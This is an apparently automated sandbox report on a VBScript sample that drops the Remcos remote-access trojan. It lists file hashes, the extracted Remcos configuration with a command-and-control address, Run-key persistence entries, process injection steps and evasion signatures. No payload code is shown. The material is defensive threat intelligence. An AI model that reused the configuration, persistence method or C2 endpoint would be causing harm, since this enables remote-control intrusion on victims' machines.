Analysis
max time kernel: 118s
max time network: 118s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
submitted: 23-12-2024 05:43
Static task: static1
Behavioral task: behavioral1
  Sample: Rokadernes.vbs
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: Rokadernes.vbs
  Resource: win10v2004-20241007-en
General
Target: Rokadernes.vbs
Size: 71KB
MD5: 693321a98dce16a4369d750bac3c4fb0
SHA1: cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
SHA256: d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
SHA512: 8e97a99d8c64243fb6a348703d5bde412e599064162fc44be9f07cc28c78fff28720cce03df253c8537dd370abbaad0748fa02f2b828a64b54c6504d4eeaf1c5
SSDEEP: 1536:mYzMve/RmHTWUZnz7FcfIJVd00cYiEzYfOEt2b4:mYiepmzWqz5tJ300bz9Et2b4
Malware Config
Extracted: remcos
RemoteHost: 87.120.120.51:2404
audio_folder: MicRecords
audio_path: ApplicationPath
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: true
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-6US4Y7
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Remcos family
Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  5     2456  powershell.exe
  7     2656  msiexec.exe
  9     2656  msiexec.exe
Executes dropped EXE (1 IoC)
  pid  Process
  924  remcos.exe
Loads dropped DLL (1 IoC)
  pid   Process
  2656  msiexec.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                                              Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7 = "\"C:\\ProgramData\\Remcos\\remcos.exe\""  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7 = "\"C:\\ProgramData\\Remcos\\remcos.exe\""                              msiexec.exe
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  pid   Process
  2656  msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  3000  powershell.exe
  2656  msiexec.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                        Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  remcos.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  2456  powershell.exe
  3000  powershell.exe
  3000  powershell.exe
Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  3000  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2456  powershell.exe
  Token: SeDebugPrivilege  3000  powershell.exe
Suspicious use of WriteProcessMemory (18 IoCs)
  description                        pid   Process         procid_target
  PID 2992 wrote to memory of 2456   2992  WScript.exe     31
  PID 2992 wrote to memory of 2456   2992  WScript.exe     31
  PID 2992 wrote to memory of 2456   2992  WScript.exe     31
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 3000 wrote to memory of 2656   3000  powershell.exe  36
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
  PID 2656 wrote to memory of 924    2656  msiexec.exe     38
Processes
C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rokadernes.vbs"
  PID: 2992
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (obfuscated PowerShell script argument omitted)
    PID: 2456
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (obfuscated PowerShell script argument omitted)
  PID: 3000
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    PID: 2656
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\ProgramData\Remcos\remcos.exe
      "C:\ProgramData\Remcos\remcos.exe"
      PID: 924
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UD5ADKK5B5YWJU115CJP.temp
  Filesize: 7KB
  MD5: 23a28a16a17ad4791a05a5dbabae09fe
  SHA1: f82d3cb5154d45f3423aa723d0b4e5b5f5ad6b59
  SHA256: acd6b4d7fafb78787594a3d9604bd81b98b2921708273827a0b7522efb84d18b
  SHA512: 4ccb047621b490b19146d7dba8714da69da5044d4111eb4dd2bc0e7faad68a5efb3e33506799faccbe51c3eda88007e1197a314a8fb26e4031def48225a44a69

  Filesize: 431KB
  MD5: e03d2d397ed28d6b14bef58a8d4d458d
  SHA1: 7d4576f4e95fce89c46f8938e4878e4978451064
  SHA256: 3431efe72e7264a06276d165454755c1a1f98b0f57132c43f8369db6b3c6324a
  SHA512: ff97033c57032e8f65334183d70c44f3d4b95151e27605aab48a68cd5dd53278ae43f8004f96d38f218c3a8d320ebf329c342199f8987691240f45855ad8ed34

  Filesize: 71KB
  MD5: eee470f2a771fc0b543bdeef74fceca0
  SHA1: bd9bbb448dec04b1aaa8ae530e9814fdbce0a3d5
  SHA256: 78617ddf9a0067a32cb5d87a796c93a9618ac006ccdcb3c7c824fdeb6ec5fd59
  SHA512: 9a89fef9c26e3dc98afdc61eea66e2b4a52843495b3433c21b5a55e744db42268e3d10587817b4c8adc7bfcc99065e0f3a7b6a7a05b1218ce7bba129d5a105e2